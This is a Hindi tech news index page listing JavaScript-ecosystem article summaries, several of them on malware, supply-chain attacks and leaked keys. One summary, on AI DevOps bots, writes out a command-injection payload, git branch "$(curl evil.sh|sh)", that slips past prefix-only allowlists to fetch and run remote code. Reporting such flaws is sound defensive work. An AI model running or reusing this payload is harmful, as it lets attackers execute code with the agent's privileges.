GyaanSetu जावास्क्रिप्ट

जावास्क्रिप्ट और टाइपस्क्रिप्ट इकोसिस्टम।

100 articlesDeep, practical knowledge

AI-संचालित 'Pi' और 'Tardis' ने छह साल बाद Shopify को React Native छोड़ने में मदद की

Shopify ने रीराइट प्रक्रिया को ऑटोमेट करने के लिए दो आंतरिक AI एजेंट बनाए—फीचर मैपिंग के लिए Pi और लाइव डिबगिंग के लिए Tardis। इससे कंपनी अपने छह साल पुराने React Native स्टैक को रिटायर कर सकी और साथ ही उसे 2 सेकंड तेज़ स्टार्टअप, 109 MB छोटा ऐप और लगभग दस गुना कम क्रैश जैसे फायदे मिले।

जावास्क्रिप्ट · 2 मिनट पढ़ें

Node 22 का Promise.withResolvers Claude Tool Loops को आधा कर देता है

भारी-भरकम `new Promise` पैटर्न की जगह एक सिंगल `Promise.withResolvers()` कॉल का उपयोग करके, डेवलपर्स resolve/reject फंक्शन्स को सिस्टम के किसी भी हिस्से को सौंप सकते हैं। इससे भूले हुए resolves, double-reject चेतावनियाँ और deep nesting जैसी समस्याएँ खत्म हो जाती हैं—जो विशेष रूप से serverless Lambda वातावरण में बहुत उपयोगी है।

जावास्क्रिप्ट · 4 मिनट पढ़ें

VIDRAFT का Pocket-35B किसी भी लैपटॉप CPU पर चलता है, 1 मिलियन डाउनलोड्स का आंकड़ा पार किया

Pocket-35B के GGUF-फॉर्मेटेड वेट्स सीधे llama.cpp या Ollama में लोड हो जाते हैं, जिससे बिना GPU बजट वाली टीमें एक स्टैंडर्ड लैपटॉप पर 35-बिलियन-पैरामीटर मॉडल चला सकती हैं—बशर्ते वे मामूली RAM की आवश्यकता को पूरा करते हों।

जावास्क्रिप्ट · 3 मिनट पढ़ें

कास्टिंग के दौरान आपका कस्टम HTML5 प्लेयर क्यों क्रैश हो जाता है – 4 छिपे हुए जाल

कास्टिंग प्लेबैक की जिम्मेदारी टीवी के फर्मवेयर को सौंप देती है, इसलिए टोकन को सेशन के खत्म होने के बाद भी वैध रहना चाहिए, CORS हेडर में टीवी का ओरिजिन शामिल होना चाहिए, और स्ट्रीम URL 'blob' नहीं हो सकता। यह गाइड बताती है कि मैनिफेस्ट URL पर कैसे स्विच करें और कनेक्शन को कैसे वैलिडेट करें।

जावास्क्रिप्ट · 3 मिनट पढ़ें

Bun की टेक्स्ट लॉकफ़ाइल CI पॉलिसी स्कैन को सक्षम करके सप्लाई-चेन जोखिमों को कैसे कम करती है

Bun v1.2 में नया डिफॉल्ट लॉकफ़ाइल एक प्लेन-टेक्स्ट bun.lock है, जो अस्पष्ट bun.lockb की जगह ले रहा है। यह बदलाव रिव्यूअर्स को वर्जन में सटीक बदलाव देखने, CI में पॉलिसी चेक चलाने और स्टैंडर्ड गिट टूल्स के साथ दुर्भावनापूर्ण घुसपैठ का पता लगाने की सुविधा देता है।

जावास्क्रिप्ट · 1 मिनट पढ़ें

JSCeal मैलवेयर क्रोम OAuth टोकन चुराकर क्रिप्टो ट्रेडर्स के लिए Google MFA को निष्प्रभावी कर देता है

केवल RAM-आधारित JSCeal पेलोड Chromium ब्राउज़रों से कुकीज़, सेव किए गए पासवर्ड और OAuth टोकन निकालता है, और फिर Google के सेकंड-फैक्टर प्रॉम्प्ट को बायपास करने के लिए सेशन को रीप्ले करता है, जिससे हमलावर Binance, Bybit, Ledger और अन्य से फंड हड़प लेते हैं।

जावास्क्रिप्ट · 2 मिनट पढ़ें

48 सेकंड के भीतर npm रजिस्ट्री पर आए 13 नकली Coinbase Wallet SDKs

7 सितंबर 2026 को 04:54:59 और 04:55:48 UTC के बीच प्रकाशित ये पैकेज, cb-wallet-http जैसे नामों के साथ @coinbase/wallet-sdk की नकल करते हैं और 0.0.1-security वर्ज़न का उपयोग करते हैं, जो यह दर्शाता है कि दुर्भावनापूर्ण कोड कितनी तेज़ी से प्रोजेक्ट्स में घुसपैठ कर सकता है।

जावास्क्रिप्ट · 2 मिनट पढ़ें

ClickFix Tampermonkey के ज़रिए सीधे ब्राउज़र से क्रिप्टो डिपॉजिट्स को हाईजैक कर रहा है

Cisco Talos ने ClickFix का पता लगाया है, जो एक क्रिप्टो-स्किमिंग स्कीम है। यह उपयोगकर्ताओं को Tampermonkey स्क्रिप्ट इंस्टॉल करने के लिए झांसा देती है। यह स्क्रिप्ट रियल-टाइम में डिपॉजिट एड्रेस को बदल देती है, जिससे ट्रांजेक्शन वैध दिखने के बावजूद फंड चोरी हो जाते हैं।

जावास्क्रिप्ट · 2 मिनट पढ़ें

npm, Cargo, Composer और pip में 13 में से केवल 2 Semver रेंज एक जैसा व्यवहार करती हैं

19 वर्ज़न नंबरों के खिलाफ 13 रेंज एक्सप्रेशन का परीक्षण करने पर केवल 17 मैचिंग परिणाम मिले, जिनमें से अधिकांश रिजेक्शन थे। Caret, tilde और dot-x सिंबल को प्रत्येक मैनेजर अलग तरह से व्याख्यायित करता है, जिससे आश्चर्यजनक विसंगतियां पैदा होती हैं।

जावास्क्रिप्ट · 2 मिनट पढ़ें

AI-संचालित DevOps बॉट्स का खुलासा: प्रीफ़िक्स व्हाइटलिस्ट हमलावरों को मनमाना कोड चलाने की अनुमति देते हैं

CVE-2026-22708 यह दर्शाता है कि केवल कमांड के पहले टोकन की जाँच करने वाले एजेंटों को आर्गुमेंट्स में छिपे पेलोड—जैसे कि, git branch "$(curl evil.sh|sh)"—के ज़रिए धोखा दिया जा सकता है, जिससे हमलावरों को ऑटोमेशन बॉट के समान ही विशेषाधिकार प्राप्त हो जाते हैं।

जावास्क्रिप्ट · 4 मिनट पढ़ें

WebFPGA 30 mW पर मात्र 4 ms में TinyML इन्फरेंस प्रदान करता है – कोई भी डेटा ब्राउज़र से बाहर नहीं जाता

WebFPGA JavaScript के माध्यम से Lattice iCE40-UP5K FPGA को प्रोग्राम करने के लिए WebUSB API का उपयोग करता है, जिससे केवल कुछ मिलीवाट की बिजली खपत के साथ 10 ms से भी कम समय में TinyML इन्फरेंस संभव हो पाता है और सारा डेटा डिवाइस पर ही सुरक्षित रहता है।

जावास्क्रिप्ट · 2 मिनट पढ़ें

लीक हुई स्ट्राइप कीज़ से 669 विक्रेताओं पर धोखाधड़ी वाले शुल्क और ग्राहकों के डेटा की चोरी का खतरा

लीक हुई इन कीज़ के जरिए हमलावर धोखाधड़ी वाले शुल्क लगा सकते हैं, इनवॉइस निकाल सकते हैं और व्यक्तिगत डेटा चुरा सकते हैं, जिससे चार्जबैक, जुर्माने और ब्रांड की प्रतिष्ठा को नुकसान पहुँचने का खतरा है। तत्काल बचाव के उपायों में डॉटफाइल्स को ब्लॉक करना, सभी कीज़ को रोटेट करना और सीक्रेट्स को वॉल्ट में सुरक्षित करना शामिल है।

जावास्क्रिप्ट · 4 मिनट पढ़ें

LibreOffice 26.8 ने पेश किया प्राइवेसी-फर्स्ट रोडमैप, AI क्लाउड कॉल्स को किया दरकिनार

नया रिलीज़ जटिल लिपियों के लिए पैराग्राफ लेआउट को बेहतर बनाता है, एक सरल ड्राफ्ट व्यू जोड़ता है, और ODF-DOCX/XLSX कन्वर्जन में सुधार करता है, वहीं सुरक्षा पैच और मैक्रो सैंडबॉक्सिंग दस्तावेजों को ऑन-प्रिमाइसेस सुरक्षित रखते हैं।

जावास्क्रिप्ट · 2 मिनट पढ़ें

नए Rust बाइनरी के साथ TypeScript 7 ने टाइप-चेकिंग लेटेंसी को 40% तक कम कर दिया

Rust में लिखा गया यह इंजन एक अलग प्रोसेस में चलता है, जो टाइप एनालिसिस को UI थ्रेड से अलग कर देता है। साथ ही, इसमें स्मार्ट कैशिंग की सुविधा जोड़ी गई है जो केवल बदली हुई फाइलों को ही दोबारा चेक करती है, जिससे इंक्रीमेंटल बिल्ड्स पहले से कहीं अधिक तेज़ हो जाते हैं।

जावास्क्रिप्ट · 2 मिनट पढ़ें

Vue 3.6 का Vapor Mode हटाता है Virtual DOM, गेम परफॉरमेंस में होगी बढ़ोतरी

Vue 3.6 का आगामी Vapor Mode सिंगल-फाइल कंपोनेंट्स को सीधे DOM कॉल्स में कंपाइल करता है, जिससे virtual-DOM diff स्टेप की आवश्यकता समाप्त हो जाती है। उन बेंचमार्क गेम्स में जो प्रति सेकंड दर्जनों बार रिपेंट होते हैं, यह बदलाव रेंडर टाइम को कम करता है और बंडल साइज को छोटा करता है, हालांकि कम-फ्रीक्वेंसी वाले UIs में इसका लाभ बहुत कम मिलता है।

जावास्क्रिप्ट · 4 मिनट पढ़ें

Anthropic ने Bun को 11 दिनों में Rust में फिर से लिखने के लिए Claude टोकन पर $165K खर्च किए

Anthropic के इंजीनियरों ने 11 दिनों में Bun के कोडबेस को Rust में फिर से लिखने के लिए 64 समानांतर Claude Fable 5 एजेंटों का उपयोग किया, जिसमें $165K का टोकन खर्च हुआ, लेकिन पोस्ट-मर्ज कंप्यूट और सुरक्षा ऑडिट को शामिल करने के बाद वास्तविक लागत इससे कहीं अधिक होने की संभावना है।

जावास्क्रिप्ट · 3 मिनट पढ़ें

Claude ने चार एजेंट टूल्स को GA में स्थानांतरित किया, जिससे उद्यमों के लिए बीटा हेडर की बाधाएं खत्म हो गईं

बीटा-ओनली रिक्वेस्ट हेडर हटने से, उद्यम अब कानूनी और सुरक्षा संबंधी बाधाओं को आखिरकार दूर कर सकते हैं। कंप्यूटर-यूज़ टूल के लिए नया बैच-एक्शन मोड कम लेटेंसी और कम टोकन उपयोग का वादा भी करता है, हालांकि बचत की पुष्टि की जानी अभी बाकी है।

जावास्क्रिप्ट · 3 मिनट पढ़ें

Next.js 16.3 ने Turbopack को स्थिर बनाया, जिससे मध्यम आकार के ऐप्स के लिए बिल्ड समय 2-5 गुना कम हो गया

यह रिलीज़ प्रोडक्शन-रेडी 'पार्शियल प्रिरेंडरिंग' भी लेकर आई है जो 'टाइम टू इंटरएक्टिव' को 40-60% तक कम कर सकती है, साथ ही सर्वर एक्शन्स के लिए बेहतर TypeScript सपोर्ट और Rust-आधारित मिडलवेयर भी प्रदान करती है, लेकिन इसके लिए Node 20+ की आवश्यकता है और यह मौजूदा Webpack प्लगइन्स को बाधित कर सकता है।

जावास्क्रिप्ट · 3 मिनट पढ़ें

TanStack Table v9 ऑप्ट-इन फीचर्स के साथ बंडल साइज को घटाकर ~5 KB कर देता है

नया बीटा आपको केवल उन्हीं ग्रिड क्षमताओं को इम्पोर्ट करने की सुविधा देता है जिनका आप उपयोग करते हैं—सॉर्टिंग कोड को पूरी तरह से छोड़ दें, डाउनलोड को लगभग 5 KB तक कम करें, और उस मेन-थ्रेड वर्क से बचें जिससे पहले INP स्कोर धीमा हो जाता था।

जावास्क्रिप्ट · 2 मिनट पढ़ें